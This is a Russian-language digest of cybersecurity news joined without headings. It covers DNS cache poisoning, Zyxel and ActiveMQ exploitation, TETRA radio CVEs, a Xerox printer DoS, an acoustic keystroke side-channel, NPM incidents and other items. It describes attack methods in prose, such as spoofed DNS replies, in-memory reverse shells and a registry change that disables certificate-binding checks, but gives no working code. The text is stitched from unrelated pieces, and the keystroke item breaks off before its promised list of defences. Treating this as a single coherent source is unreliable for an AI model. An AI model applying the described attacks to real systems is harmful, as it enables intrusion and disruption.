Сценарий атаки: когда DNS-резолвер пытается определить доменное имя, он отправляет UDP-запрос на обслуживающий домен DNS-сервер. В момент, когда резолвер ожидает ответа, атакующий может быстро определить номер исходного порта, который использовался для отправки запроса, и отправить на него поддельный ответ, выдав себя за обслуживающий домен DNS-сервер, используя спуфинг IP-адреса. DNS-резолвер поместит в кэш переданные в поддельном ответе данные и какое-то время на все другие DNS-запросы доменного имени будет возвращать подставленный атакующим IP-адрес.
Из-за маленького размера камеры, установленной в аксессуаре, люди могут не понять, что их записывают на видео.
Умные очки Facebook и Ray-Ban, в которых установлена маленькая камера, вызвали
тревогу у европейских регуляторов.
В частности, ирландская комиссия по защите данных (DPC) попросила Facebook
продемонстрировать, что индикатор, который показывает факт записи видео,
хорошо заметен со стороны.
Регуляторы отметили, что люди могут не подозревать о ведущейся записи — ведь
индикатор в умных очках очень маленький. При этом эксперты отметили, что
Facebook не публиковал результаты полевого исследования, в котором оцениваются
возможные риски нарушения конфиденциальности.
Представители Facebook отметили, что продолжат сотрудничество с DPC и
постараются рассказать людям как можно больше о технологии очков.
«Мы продолжим работать с государственными партнерами из разных стран, включая
ирландский DPC, чтобы помочь людям понять больше о том, как работает новая
технология и какие механизмы контроля у них есть», — заявили в Facebook.
«Умные» очки Facebook появились в продаже в этом месяце. Девайс обладает 2
встроенными камерами, имеющими разрешение в 5 мегапикселей. Благодаря им
человек сможет делать фотографии и снимать видеоролики, используя Assistant
или кнопку.
Очки синхронизированы с Facebook View app, позволяющим моментально отправлять
видео и фотографии в социальные сети или мессенджеры.
Пользователи популярной VR-игры Gorilla Tag нашли способ обойти правила и быстрее победить соперников с помощью VPN-приложения, которое содержало в себе скрытые вредоносные функции.
В интернете появились видеоруководства, где объясняется, как установить VPN на гарнитуры виртуальной реальности Meta*. Приложение Big Mama VPN стало самым популярным выбором, так как оно бесплатно, не требует регистрации и, по словам авторов видео, помогает создавать задержки, которые дают игрокам преимущество.
Однако использование Big Mama VPN связано с серьёзными рисками. Исследователи из Trend Micro выяснили, что приложение подключает устройства пользователей к прокси-сети. Другие люди могут использовать их интернет-соединение для анонимной активности в сети. Тапкая технология, известная как резидентный прокси, часто используется киберпреступниками для кибератак, создания ботнетов и других незаконных действий.
По данным Trend Micro, устройства Meta стали третьими по популярности в сети Big Mama, уступая лишь смартфонам Samsung и Xiaomi. Использование таких приложений может сделать домашний интернет частью кибератак или мошеннических схем. Разработчики [Gorilla Tag](https://www.meta.com/en- gb/experiences/gorilla-tag/4979055762136823/) заявляют, что в игре используются механизмы для выявления подозрительной активности, однако загрузка сторонних приложений остаётся вне контроля создателей.
Дополнительные исследования показали, что прокси-сеть Big Mama активно продвигается на киберпреступных форумах и в Telegram. Эксперты из компании Kela выявили более тысячи сообщений о её использовании, начиная с 2020 года. Там обсуждаются настройки и способы применения сети для обхода блокировок или проведения атак. Хотя представители Big Mama утверждают, что сервис используется только легально, реклама прокси вызывает сомнения.
На своём сайте Big Mama VPN открыто сообщает, что трафик пользователей может быть использован для других целей. Услуги включают сбор данных для анализа цен, покупку билетов и другие задачи, которые могут быть использованы как в легальных, так и в спорных целях.
Ранее Trend Micro обнаружила уязвимость в приложении Big Mama VPN, которая могла позволить злоумышленникам получить доступ к локальной сети устройства. Ошибка была исправлена, но эксперты напоминают, что использование бесплатных VPN-приложений всегда связано с рисками для конфиденциальности и безопасности. Специалисты советуют загружать приложения только из официальных магазинов и внимательно читать их условия, чтобы избежать угроз для своих данных и устройств.
Хакерам ничего не стоит добавить уязвимые устройства в свой ботнет и использовать в масштабных DDoS-кампаниях.
Сетевые устройства Zyxel, которые не были обновлены после обнаружения критической уязвимости в апреле, стали главной целью хакеров, которые используют их для создания ботнетов и проведения DDoS-атак.
Уязвимость, получившая идентификатор CVE-2023-28771 , позволяет злоумышленникам выполнить произвольный код на устройствах Zyxel с помощью специально сформированного пакета IKEv2. Она затрагивает межсетевые экраны и VPN-серверы Zyxel с настройками по умолчанию. 25 апреля Zyxel выпустил патч для этой уязвимости, но многие организации до сих пор не обновили свои устройства.
В конце мая организация Shadowserver, которая отслеживает интернет-угрозы в режиме реального времени, предупредила , что множество устройств Zyxel были скомпрометированы в атаках, которые до сих пор не прекращаются. Shadowserver рекомендовала считать все уязвимые устройства заражёнными.
На прошлой неделе компания Fortinet опубликовала собственное исследование , в котором сообщила о резком росте активности атак, проводимых разными хакерскими группами в последние недели. Большинство атак основаны на вариантах Mirai — программе для поиска и эксплуатации общих уязвимостей в роутерах и других устройствах интернета вещей. После успешной эксплуатации Mirai объединяет устройства в ботнеты, которые могут проводить масштабные DDoS-атаки.
Между тем, PoC-эксплойт для уязвимых устройств Zyxel был опубликован исследователями ещё в начале июня, чтобы как-то подстегнуть владельцев данного сетевого оборудования обновить свои устройства. Но, похоже, данный план не сработал, судя по тому громадному количеству устройств, всё ещё подверженным уязвимости.
«С момента публикации модуля эксплойта наблюдается постоянный всплеск злонамеренной активности. Анализ, проведённый FortiGuard Labs, показал значительное увеличение числа атак с мая. Мы также выявили несколько ботнетов, включая Dark.IoT, основанный на Mirai, а также другой ботнет, который использует специализированные методы DDoS-атак», — заявила в отчёте Fortinet исследователь безопасности Кара Лин.
Лин отдельно отметила, что в течение последнего месяца атаки, использующие CVE-2023-28771, фиксировались с разных IP-адресов и специально нацеливались на возможность внедрения команд в пакете Internet Key Exchange, передаваемом устройствами Zyxel. Атаки осуществлялись с помощью инструментов, таких как curl и wget, которые загружали злонамеренные скрипты с серверов, контролируемых хакерами.
Кроме Dark.IoT, другие программы для создания ботнетов, использующие уязвимость, включали Rapperbot и Katana.
Учитывая возможность выполнения эксплойтов непосредственно на уязвимых устройствах, можно было предположить, что затронутые организации уже давно устранили данную уязвимость. Но увы, продолжающиеся успешные попытки эксплуатации демонстрируют, что немалое число компаний по какой-то причине до сих пор этого не сделало.
«Наличие известных уязвимостей в корпоративных устройствах может привести к серьёзным рискам. Как только злоумышленники получат контроль над уязвимым устройством, они могут включить его в свой ботнет, что позволит выполнять различного рода атаки, такие как DDoS», — отметила Лин.
Эксперт Fortinet также добавила, что организациям крайне важно правильно расставлять приоритеты и уделять больше внимания безопасности. Устанавливать обновления и исправления нужно регулярно, в ином случае вся внутренняя инфраструктура компании будет под угрозой хакерской атаки.
Майское обновление Microsoft Patch вторник вызывает ошибки аутентификации.
Microsoft предупреждает клиентов о том, что майское обновление, выпущенное [во
вторник ](https://docs.microsoft.com/en-us/windows/release-health/status-
windows-11-21h2#2826msgdesc), вызывает ошибки и сбои аутентификации, связанные
с доменными службами Windows Active Directory. В пятничном обновлении
Microsoft заявила, что изучает проблему.
Предупреждение появляется на фоне общих отчетов
о
сбое нескольких служб и политик после установки обновления безопасности.
«Аутентификация не удалась из-за несоответствия учетных данных пользователя.
Либо предоставленное имя пользователя не соответствует существующей учетной
записи, либо введен неправильный пароль». опубликовал админ в ветке Reddit по
этой теме.
По данным Microsoft, проблема возникла после установки обновлений, выпущенных
10 мая 2022 года.
«После установки обновлений, выпущенных 10 мая 2022 г., на ваших контроллерах
домена вы можете столкнуться с ошибками аутентификации на сервере или клиенте
для таких служб, как [сервер политики сети (NPS)
](https://docs.microsoft.com/en-us/windows-
server/networking/technologies/nps/nps-top), [служба маршрутизации и
удаленного доступа (RRAS) ](https://docs.microsoft.com/en-us/previous-
versions/windows/it-pro/windows-server-2012-R2-and-2012/dn614140(v=ws.11)),
[Radius ](https://docs.microsoft.com/en-us/windows/win32/nps/ias-radius-
authentication-and-accounting), [Extensible Authentication Protocol ( EAP)
](https://docs.microsoft.com/en-us/windows-
server/networking/technologies/extensible-authentication-protocol/network-
access)и [защищенный расширяемый протокол аутентификации (PEAP)
](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
peap/a128a089-0919-41a5-a0c2-9f25ef28289d)», — сообщает Microsoft.
«Обнаружена проблема, связанная с тем, как контроллер домена обрабатывает
сопоставление сертификатов с учетными записями компьютеров», — добавили в
Microsoft.
Контроллер домена — это сервер, который отвечает за ответы на запросы
аутентификации, а также за проверку пользователя в компьютерной сети, а
активный каталог — это тип службы каталогов, которая хранит информацию об
объектах в сети и делает эту информацию легкодоступной. для пользователей.
Microsoft добавила примечание о том, что обновление не повлияет на клиентские
устройства Windows и серверы Windows, не являющиеся контроллерами домена, и
вызовет проблемы только для сервера, выступающего в качестве контроллера
домена.
«Установка обновлений, выпущенных 10 мая 2022 года, на клиентских устройствах
Windows и серверах Windows, не являющихся контроллерами домена, не вызовет
этой проблемы. Эта проблема касается только установки обновлений от 10 мая
2022 года, установленных на серверах, используемых в качестве контроллеров
домена». Майкрософт объясняет.
[Microsoft выпускает еще один документ ](https://support.microsoft.com/en-
us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-
controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_compatmode), объясняющий
дополнительные подробности, связанные с проблемой аутентификации, вызванной
обновлением безопасности, устраняющим уязвимости повышения привилегий в
Windows Kerbose и ее доменной службе Active Directory.
Уязвимости отслеживаются как [CVE-2022-26931 ](https://cve.mitre.org/cgi-
bin/cvename.cgi?name=2022-26931)в Windows Kerberos с рейтингом высокой
опасности CVSS 7,5 и [CVE-2022-26923 ](https://cve.mitre.org/cgi-
bin/cvename.cgi?name=CVE-2022-26923)(обнаружена исследователем безопасности
[Оливером Ляком ](https://research.ifcr.dk/certifried-active-directory-domain-
privilege-escalation-cve-2022-26923-9e098fe298f4)) в доменных службах
Microsoft Active Directory. Он имеет оценку CVSS 8,8 и оценивается как
высокий. Злоумышленник может воспользоваться уязвимостью, если она не будет
исправлена, и повысить привилегии до прав администратора домена
.
Microsoft рекомендует администраторам домена [вручную сопоставлять
](https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-
authentication-changes-on-windows-domain-controllers-
ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_certmap)сертификаты с пользователем
в Active Directory, пока не будут доступны официальные обновления.
«Администраторы домена могут вручную сопоставлять сертификаты с пользователем
в Active Directory, используя атрибут altSecurityIdentities объекта
пользователя», — добавила Microsoft.
«Если предпочитаемое средство защиты не будет работать в вашей среде, см.
[«KB5014754 ](https://support.microsoft.com/topic/kb5014754-certificate-based-
authentication-changes-on-windows-domain-controllers-
ad2c23b0-15d8-4340-a468-4d4f3b188f16)— Изменения проверки подлинности на
основе сертификатов на контроллерах домена Windows» для других возможных мер в
разделе ключа реестра SChannel», — сообщает Microsoft.
Согласно Microsoft, любой другой метод смягчения может не обеспечить
адекватного усиления безопасности.
Согласно Microsoft, обновление от мая 2022 года разрешает все попытки
аутентификации, если только сертификат не старше пользователя, это связано с
тем, что обновления автоматически устанавливают ключ реестра
StrongCertificateBindingEnforcement, «который изменяет режим принудительного
применения KDC на Disabled Mode, Compatibility Mode, или Full Enforcement
Mode», — объясняет Microsoft.
Один из оконных администраторов, который разговаривал с Bleepingcomputer ,
сказал, что единственный способ, которым они смогли заставить некоторых
пользователей войти в систему с помощью следующей установки исправления, — это
отключить ключ StrongCertificateBindingEnforcement, установив для него
значение 0.
Изменив значение REG_DWORD DataType на 0, администратор может отключить
проверку надежного сопоставления сертификатов и создать ключ с нуля. Этот
метод не рекомендуется Microsoft, но это единственный способ разрешить вход
всем пользователям.
Корпорация Майкрософт должным образом расследует проблемы, и в ближайшее время
должно быть доступно соответствующее исправление.
Microsoft также недавно выпустила [73 новых патча
](https://threatpost.com/microsoft-zero-day-mays-patch-
tuesday/179579/)ежемесячного майского обновления исправлений безопасности.
Женщина имела доступ к автоматизированной банковской системе, благодаря чему получала информацию о клиентах. За криптовалюту она продавала ее в мессенджерах и на тематических форумах. За совершенное злоумышленнице может грозить до 3 лет тюрьмы.
Разоблачили противоправную деятельность 30-летней местной жительницы сотрудники Управления противодействия киберпреступлениям в Днепропетровской области совместно со следователями Днепровского районного управления полиции области и службой безопасности банка.
Об этом сообщили 11 февраля в департаменте киберполиции Национальной полиции Украины.
Женщина работает руководителем отделения одного из банков в Днепре и имела доступ к автоматизированной банковской системе. Пользуясь своими полномочиями, она получала информацию о клиентах, составляющую банковскую тайну. А именно: информацию о наличии банковских счетов, денежных активах, источниках поступления, движении средств, депозитах и прочему.
В дальнейшем на тематических форумах и в мессенджере за криптовалюту руководитель отделения банка сбывала такую информацию. Денежное вознаграждение за предоставление информации о клиентах банка стартовало от 20 тысяч гривен.
Правоохранители провели обыски по месту работы и проживания фигурантки уголовного дела. По результатам обысков полицейские изъяли компьютерную технику, мобильный телефон, банковские карты, черные записи.
Женщине сообщили о подозрении по ч. 2 ст. 362 (несанкционированные действия с информацией, которая обрабатывается в компьютерах, автоматизированных системах, компьютерных сетях или хранится на носителях такой информации, совершенные лицом, имеющим право доступа к ней) Уголовного кодекса Украины. Подозреваемой может грозить до трех лет лишения свободы. Следственные действия продолжаются.
Процессуальное руководство осуществляет Днепровская местная прокуратура.
В отдел МВД России «Верхнекамский» обратился житель г. Кирса с заявлением о взломе его аккаунта в одной из популярных социальных сетей. Неизвестный под его именем стал рассылать друзьям в группе письма с просьбой дать денег в долг. Сумма фигурировала небольшая – 2,5 тысячи рублей, поэтому один из знакомых не увидел подвоха и перевел деньги на указанный в переписке счет. Остальные попытки завладеть деньгами обманом успеха не имели.
В результате работы по раскрытию преступления сотрудники отдела по борьбе с киберпреступлениями (ОБК) УМВД России по Кировской области установили, что вход в аккаунт потерпевшего был осуществлен с ip-адреса жителя г. Арзамаса Нижегородской области. Выехав в командировку, полицейские задержали предполагаемого злоумышленника, в совершении преступления он сознался. У него изъят компьютер, банковские карты.
Молодому человеку предъявлено обвинение по ч. 2 ст. 272 Уголовного кодекса Российской Федерации «Неправомерный доступ к компьютерной информации». Санкция статьи предусматривает максимальное наказание в виде лишения свободы на срок до 4 лет.
Устанавливается его причастность к другим эпизодам противоправной деятельности.
Теперь стало намного проще взломать и захватить контроль над сервером.
Компания VulnCheck продемонстрировала новую технику эксплуатации критической уязвимости в Apache ActiveMQ, позволяющую выполнять произвольный код в памяти. Уязвимость удалённого выполнения кода CVE-2023-46604 (CVSS: 10.0) позволяет злоумышленнику запускать произвольные команды оболочки. Apache устранила ошибку в версиях ActiveMQ 5.15.16, 5.16.7, 5.17.6 и 5.18.3.
С тех пор уязвимость активно эксплуатируется группами вымогателей для развертывания вымогательсктого ПО HelloKitty , вируса, схожего с TellYouThePass, и трояна удаленного доступа SparkRAT . По данным VulnCheck, киберпреступники, эксплуатирующие уязвимость, опираются на общедоступный PoC- эксплоит (Proof-of-Concept, PoC), который был впервые обнародован в конце октября.
В атаках используется ClassPathXmlApplicationContext, класс, являющийся частью фреймворка Spring и доступный в ActiveMQ, для загрузки вредоносного XML-файла конфигурации через HTTP и достижения удаленного выполнения кода на сервере в обход аутентификации.
Компания VulnCheck заявила, что ей удалось создать более эффективный эксплоит, который опирается на класс FileSystemXmlApplicationContext и встраивает специально разработанное выражение SpEL вместо атрибута «init-method» для достижения тех же результатов и даже получения обратного шелла (Reverse Shell).
Другими словами, хакеры могли бы избежать записи своих инструментов на диск. Они могли бы просто написать свой шифровальщик на Nashorn (или загрузить класс JAR в память) и остаться в памяти. Однако такое действие вызывает сообщение об исключении в файле activemq.log, что требует от злоумышленников также предпринять шаги по уничтожению следов.
В VulnCheck сказали, что теперь, когда злоумышленники могут выполнять скрытые атаки, используя CVE-2023-46604, становится еще более важным обновить серверы ActiveMQ и, в идеале, полностью закрыть доступ к ним из Интернета.
Подробнее: https://www.securitylab.ru/news/543721.php
Google избавляется от лишних балластов и внедряет функции, которые могут стать ГОСТом для всех последующих ОС.
Google представила новые функции Android 14, которые открывают новую главу в области безопасности мобильных устройств.
**Ключевые особенности:
Отключение 2G: **Android 14 предоставляет IT-администраторам инструменты для отключения поддержки 2G на управляемых устройствах, учитывая устаревшие стандарты безопасности технологии. Параметр добавлен в дополнение к более 200 элементам управления, доступным в Android Enterprise, включая возможность отключения WiFi, Bluetooth и передачи данных через USB.
Борьба с нулевым шифрованием: Введена функция, которая препятствует использованию сотовой связи с нулевым шифром (нулевой шифр), усиливая конфиденциальность пользовательских данных. Google предупреждает, что некоторые типы связи, такие как голосовые вызовы с коммутацией каналов и SMS- сообщения, все еще могут быть раскрыты в сотовых сетях с нулевым шифром.
Защита от внешних угроз: Android 14 акцентирует внимание на защите от ложных базовых станций (IMSI-ловушки или Stingray-устройства), которые могут использоваться для перехвата данных. Атаки Stingray были в значительной степени смягчены в 4G. Однако, поскольку переход на 2G-соединение по-прежнему возможен, мошеннические сотовые станции все еще могут использоваться для выполнения атаки «человек посередине» (Man-in-The-Middle, MiTM).
Стоит отметить также, что Android 14 использует принцип «все сети являются враждебными», чтобы защитить пользователей от внедрения, изменения или перехвата сетевых пакетов. Google продолжает активное сотрудничество с сообществом учёных и компаний по стандартизации для разработки и улучшения стандартов безопасности сотовой связи.
Лаборатория Касперского провела исследование , в котором сравнила популярные мессенджеры по разным критериям: шифрование, аутентификация, анонимность и другие. Результаты показали, что ни один мессенджер не обеспечивает полную защиту данных пользователей, но некоторые из них выделяются своими преимуществами.
Были протестированы приложения Apple iMessage, Facebook Messenger, Google Сообщения, Signal, Telegram, WhatsApp. Рейтинг мессенджеров по данным Лаборатории Касперского выглядит следующим образом:
Signal
Преимущества: предоставляет сквозное шифрование (End-to-End Encryption, E2EE)
для всех чатов, хранит зашифрованные резервные копии, позволяет сравнивать
ключи шифрования, полностью скрывает и не хранит метаданные, предлагает
самоуничтожающиеся сообщения, позволяет отключать предпросмотр ссылок и
блокировать скриншоты;
Недостатки: нельзя регистрироваться без номера телефона и нет связи с другими
сервисами или аккаунтами;
WhatsApp
Преимущества: E2EE для всех чатов, зашифрованные резервные копии, сравнение
ключей шифрования, самоуничтожающиеся сообщения, возможность связи с другими
аккаунтами или сервисами;
Недостатки: не позволяет регистрироваться без номера телефона, не позволяет
скрывать номер телефона от контактов, хранит метаданные, не позволяет
отключать предпросмотр ссылок и не блокирует скриншоты.
Apple iMessage
Преимущества: E2EE в определенных случаях, зашифрованные резервные копии,
сравнение ключей шифрования, возможность регистрации без номера телефона,
скрытие номера телефона от контактов, и связь с другими сервисами или
аккаунтами;
Недостатки: Протокол шифрования не верифицирован, хранит метаданные, не
предлагает самоуничтожающиеся сообщения, не позволяет отключать предпросмотр
ссылок и не блокирует скриншоты.
Telegram
Преимущества: E2EE в секретных чатах, сравнение ключей шифрования, скрытие
номера телефона от контактов, самоуничтожающиеся сообщения, отключение
предпросмотра ссылок и блокировка скриншотов в секретных чатах;
Недостатки: E2EE не доступна для всех чатов и групп, протокол шифрования не
верифицирован, не имеет зашифрованных резервных копий, требуется номер
телефона для регистрации, хранит метаданные и не имеет связей с другими
сервисами или аккаунтами.
Facebook Messenger
Преимущества: E2EE в специальных типах чатов и групп, сравнение ключей
шифрования, скрытие номера телефона от контактов, возможность сложной
регистрации без номера телефона, связь с другими сервисами или аккаунтами, и
оповещение о скриншоте;
Недостатки: E2EE не доступна для всех чатов и групп, не имеет зашифрованных
резервных копий, хранит метаданные, минимальный срок для самоуничтожающихся
сообщений – 5 секунд, и не позволяет отключать предпросмотр ссылок.
Google Сообщения
Преимущества: E2EE в некоторых случаях и проверенные протоколы шифрования;
Недостатки: E2EE не доступна для всех чатов и групп, нет зашифрованных
резервных копий, нет возможности сравнения ключей шифрования, требуется номер
телефона для регистрации, не позволяет скрывать номер телефона от контактов,
хранит метаданные, не предлагает самоуничтожающиеся сообщения, не позволяет
отключать предпросмотр ссылок и не блокирует скриншоты.
Эксперты Лаборатории Касперского рекомендуют пользователям выбирать мессенджеры в зависимости от потребностей и целей общения, а также соблюдать правила цифровой гигиены: использовать двухфакторную аутентификацию (2FA), не передавать личные данные через мессенджеры, не открывать подозрительные ссылки и файлы, не использовать одинаковые пароли для разных сервисов и т.д.
Грозящая DoS уязвимость в принтерах Xerox была обнаружена полтора года назад. В ответ на уведомление вендор подтвердил наличие проблемы, однако о выпуске патча автор находки узнал лишь из бюллетеня от 27 января, опубликованного на сайте компании.
Уязвимость CVE-2022-23968, которую в Xerox оценили как критическую, позволяет вызвать постоянный отказ в обслуживании с помощью специально созданного TIFF-файла, отосланного в запросе HTTP POST. Эксплойт можно осуществить по сети или через интернет, особых разрешений для этого не требуется.
Проблему обнаружил исследователь из NeoSmart Technologies Махмуд аль-Кудси (Mahmoud Al-Qudsi). Как оказалось, веб-интерфейс Xerox поддерживает формат TIFF, однако при парсинге таких изображений принтер может выдать ошибку и прочно зависнуть.
В ходе эксперимента аль-Кудси [удалось](https://neosmart.net/blog/2022/xerox- vulnerability-allows-unauthenticated-network-users-to-remotely-brick- printers/) вызвать DoS при попытке вывода на печать многостраничного TIFF- документа с неполным каталогом изображений. Система сразу же вывела сообщение об ошибке и запросила холодную перезагрузку, однако перезапуск не помог — принтер попытался возобновить выполнение задания печати и столкнулся с той же проблемой.
Цикл оказался бесконечным, отключение принтера от сети положение не спасало; интерфейс очереди печати тоже отказал. По словам автора находки, очистить очередь печати в этом случае можно лишь запуском процесса обновления прошивки; проблему решит также очистка памяти устройства вручную, через физический доступ.
Уязвимости подвержены полтора десятка моделей семейства VersaLink и два принтера WorkCentre и Phaser с прошивками версий ниже xx.61.23 (вышла в июне 2020 года). Полный список затронутых продуктов приведен в [бюллетене](https://securitydocs.business.xerox.com/wp- content/uploads/2022/01/Xerox-Security-Bulletin-XRX22-002-Special-Bulletin- Regarding- CVE-2022-23968.pdf?_ga=2.68057049.935246599.1643254793-1871406055.1615898537) Xerox. В качестве временной меры защиты аль-Кудси советует запретить неавторизованный доступ к принтеру через настройки.
На пике мощность атаки достигала 3,47 Тбит/с.
Microsoft сообщила о сдерживании самой мощной на сегодняшний день DDoS-атаки на пользователей облачной платформы Azure. Согласно отчету корпорации, мощность DDoS-атаки составила 3,47 терабит в секунду (Tbps).
DDoS-атаку, совершенную в ноябре 2021 года, в Microsoft Azure назвали мощнейшей в истории интернета. Как сообщается, для организации DDoS были задействованы более 10 тысяч источников из десятков стран. В их числе — США, Китай, Южная Корея и Россия.
Векторами атаки стали насыщение полосы пропускания UDP-пакетами на порт 80 с использованием протокола обнаружения служб (SSDP), упрощённого протокола доступа к каталогам (CLDAP), системы доменных имен (DNS) и протокола сетевого времени (NTP).
Всего в 2021 году компания отразила 611 657 уникальных кибератак: 251 944 в первом полугодии и на 40% больше — 359 713 — во втором. Наибольшее количество инцидентов пришлось на 10 мая и 10 августа — 2043 и 4296, соответственно.
Исследователи обнаружили несколько новых уязвимостей в базовой станции и системном чипе Motorola, необходимых для работы и дешифровки алгоритма связи TETRA. Недостатки безопасности могут привести к утечке конфиденциальной информации.
TETRA (Terrestrial Trunked Radio) — это мировой стандарт зашифрованной двусторонней связи, разработанный под эгидой Европейского института стандартов телекоммуникаций (ETSI). Системы TETRA используются в сферах общественной безопасности и промышленно-коммерческих секторах.
Специалисты компании Midnight Blue на конференции Black Hat USA рассказали , что смогли провести атаку на доверенную среду выполнения (Trusted Execution Environment, TEE) базовой станции, расшифровать модуль и получить ключ AES. Атака позволила исследователям извлечь ключ Motorola и дешифровать трафик TETRA.
Эксперты подчеркнули, что сам алгоритм TETRA не был взломан. Исследователи просто смогли получить ключ дешифрования .
В ходе исследования были обнаружены 4 уязвимости в мобильной радиостанции Motorola MTM5400, 2 из которых критические. Также были найдены уязвимости в системном чипе OMAP-L138, используемом в радио Motorola. Чип широко используется в базовых станциях TETRA от различных производителей.
CVE-2022-26941 : уязвимость строки формата в обработчике команд AT+CTGL, позволяющая выполнять произвольный код с root-привилегиями;
CVE-2022-26942 : недостаток проверки указателя в пользовательском коде модуля Motorola TEE, который позволяет злоумышленнику выполнять произвольный код в режиме супервизора в TEE с root-привилегиями в наиболее чувствительной части радио;
CVE-2022-26943 : ошибка повреждённого генератора случайных чисел (RNG), которая позволяет хакеру использовать уязвимость в алгоритме аутентификации ( CVE-2022-24400) радиостанций Motorola;
CVE-2022-27813 : уязвимость ненастроенных модулей защиты памяти позволяет
осуществлять боковое перемещение от процессора приложений (Application
Processor, AP) к процессору цифровых сигналов (Digital Signal Processor, DSP).
Также были раскрыты 3 уязвимости нулевого дня критического уровня опасности,
которые находились в системе-на-чипе (System-on-Chip, SoC) OMAP-L138,
используемой в радио Motorola. Этот чип популярен среди базовых полос TETRA от
разных производителей, а также используется в других продуктах. Были
обнаружены следующие проблемы:
CVE-2022-25332 : уязвимость позволяет провести атаку по сторонним каналам (Side-channel attack) в подпрограмме TEE SK_LOAD, который позволяет злоумышленникам восстановить ключ шифрования клиента (CEK) и расшифровать важные модули (например, те, которые защищают криптографические алгоритмы TETRA). Поскольку подпрограмма реализована в масочных ПЗУ (Read-Only Memory, ROM), уязвимость неустранима.
CVE-2022-25334 : переполнение стека (Stack overflow) в поле длины подписи TEE SK_LOAD, которое позволяет злоумышленникам получить выполнение произвольного кода в безопасном режиме супервизора внутри TEE. Ошибка является полным нарушением архитектуры безопасности TEE и не подлежит устранению, поскольку подпрограмма реализована в масочных ПЗУ.
CVE-2022-25333 : ошибка проверки подлинности RSA-ключа в подпрограмме TEE
SK_LOAD позволяет злоумышленникам подделывать вредоносные модули и в сочетании
с CVE-2022-25332 может использоваться для выполнения произвольного кода в
режиме супервизора в TEE. Брешь полностью нарушает архитектуру безопасности
TEE и не подлежит устранению, поскольку подпрограмма реализована в масочных
ПЗУ.
Кроме того, в процессе разработки эксплойта команда Midnight Blue обнаружила 5
дополнительных уязвимостей в базовой станции Motorola MBTS TETRA, 3 из которых
имеют высокий уровень опасности.
По словам исследователей, несмотря на то, что базовая станция Motorola MBTS является устаревшей, обнаруженные уязвимости демонстрируют, что инфраструктура связи отстает на годы, если не десятилетия, от ожидаемого уровня безопасности. При чём проблема касается не только Motorola, но и всей отрасли.
Напомни, что ранее исследователи Midnight Blue уже раскрывали несколько уязвимостей в стандарте TETRA, включая бэкдор в одном из алгоритмов шифрования, которая позволяет узлу с низким уровнем доступа перехватывать зашифрованные сообщения. Другие уязвимости связаны с неправильной обработкой временных меток и созданием ключевых потоков, что может позволить злоумышленнику подделывать сообщения.
Группа ученых разработала «акустическую side-channel атаку», основанную на модели глубокого обучения (deep learning). Атаку можно использовать для определения нажатий клавиш, звук которых был записан с помощью микрофона находящегося поблизости телефона. Точность определения составляет до 95%.
В своем исследовании специалисты сообщают, что сочетание машинного обучения, повсеместно используемых микрофонов и видеозвонков может представлять большую угрозу для пользователей. В частности, ноутбуки наиболее подвержены риску перехвату нажатий клавиш, звук которых можно без труда записать в тихих общественных местах (кофейни, библиотеки или офисы). К тому же большинство ноутбуков имеют унифицированные, немодульные клавиатуры, из-за чего у разных моделей могут быть одинаковые акустические профили.
Отмечается, что клавиатуры могут стать легкодоступным вектором для атак, потому что во время печати пользователям не приходит в голову как-то скрывать свои действия. «Например, при наборе пароля люди регулярно прячут экран, но мало что делают для того, чтобы скрыть звук клавиатуры», — говорят авторы доклада.
Для своих экспериментов исследователи использовали ноутбук MacBook Pro 2021
года, который «имеет клавиатуру, идентичную по конструкции переключателей
моделям последних двух лет и, возможно, будущих». Для обучения модели формам
волн, которые связаны с нажатием отдельных клавиш, эксперты нажимали на каждую
из 36 клавиш по 25 раз, прилагая разное усилие и используя разные пальцы.

Для записи звука клавиатуры в первом тесте использовался iPhone 13 mini,
расположенный на расстоянии 17 см от ноутбука. Во втором тесте запись и вовсе
осуществлялась через Zoom, с помощью встроенных микрофонов MacBook, при этом
шумоподавление в Zoom было установлено на минимальный уровень.
В обоих тестах исследователям удалось достичь точности более 93% (при этом
точность записи звука с телефона приблизилась к 95-96%). Skype, в свою
очередь, дал более низкую, но все еще пригодную точность — 91,7%.

Исследователи предлагают несколько способов защиты от подобных атак:
Компания GitHub [раскрыла](https://github.blog/2021-11-15-githubs-commitment- to-npm-ecosystem-security/) информацию о двух инцидентах в инфраструктуре репозитория пакетов NPM. 2 ноября сторонние исследователи безопасности (Kajetan Grzybowski и Maciej Piechota) в рамках программы Bug Bounty сообщили о наличии в репозитории NPM уязвимости, позволяющей опубликовать новую версию любого пакета, используя для этого неавторизированную учётную запись.
Уязвимость была вызвана некорректной проверкой полномочий пользователей в коде микросервисов, обрабатывающих запросы с NPM. Сервис авторизации выполнял проверку прав доступа к пакетам на основе данных, передаваемых в запросе, но другой сервис, загружающий обновление в репозиторий, определял пакет для публикации на основе содержимого метаданных в загруженном пакете. Таким образом атакующий мог запросить публикацию обновления для своего пакета, к которому он имеет доступ, но указать в самом пакете информацию о другом пакете, который и был бы в итоге обновлён.
Проблема была устранена через 6 часов после появления информации об уязвимости, но проблема присутствовала в NPM дольше, чем охватывают логи с телеметрией. GitHub утверждает, что следов совершения атак с использованием данной уязвимости с сентября 2020 года не зафиксировано, но нет гарантий, что проблема не экслуатировалась раньше.
Второй инцидент произошёл 26 октября. В ходе технических работ с базой данной сервиса replicate.npmjs.com было выявлено присутствие в доступной для внешних запросов БД конфиденциальных данных, раскрывающих информацию о именах внутренних пакетов, которые упоминались в логе изменений. Информация о подобных именах может быть использована для совершения атак на зависимости во внутренних проектах (в феврале подобная атака позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний).
Кроме того, в связи с участившимися случаями захвата репозиториев крупных проектов и продвижения вредоносного кода через компрометацию учётных записей разработчиков, компания GitHub [приняла решение](https://github.blog/2021-11-15-githubs-commitment-to-npm-ecosystem- security/) ввести обязательную двухфакторную аутентификацию. Изменение вступит в силу в первом квартале 2022 года и будет распространяться на сопровождающих и администраторов пакетов, включённых в список наиболее популярных. Дополнительно сообщается о модернизации инфраструктуры, в которой будет внедрён автоматизированный мониторинг и анализ новых версий пакетов для раннего выявления вредоносных изменений.
